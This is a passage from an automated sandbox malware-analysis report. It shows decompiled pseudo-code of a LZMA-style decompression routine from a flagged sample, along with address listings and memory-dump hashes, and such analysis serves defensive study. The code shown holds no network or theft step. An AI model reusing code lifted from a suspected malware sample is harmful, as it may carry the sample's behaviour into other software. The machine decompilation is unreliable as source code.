								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                    0x0040673b
                                                    0x00406742
                                                    0x00406748
                                                    0x0040674e
                                                    0x00000000
                                                    0x00406752
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406774
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x00406789
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d4
                                                    0x004067d7
                                                    0x004067ff
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067d9
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f1
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x00406848
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x0040684d
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686a
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b0
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f58
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f8e
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00000000
                                                    0x0040714a
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb6
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00000000
                                                    0x00406967
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040694a
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00000000
                                                    0x00406cb2
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x00000000
                                                    0x00407004
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406fc2
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407066
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x00407098
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00407160
                                                    0x00407166
                                                    0x00407168
                                                    0x0040716f
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                    • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                    • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                    • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406B79() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
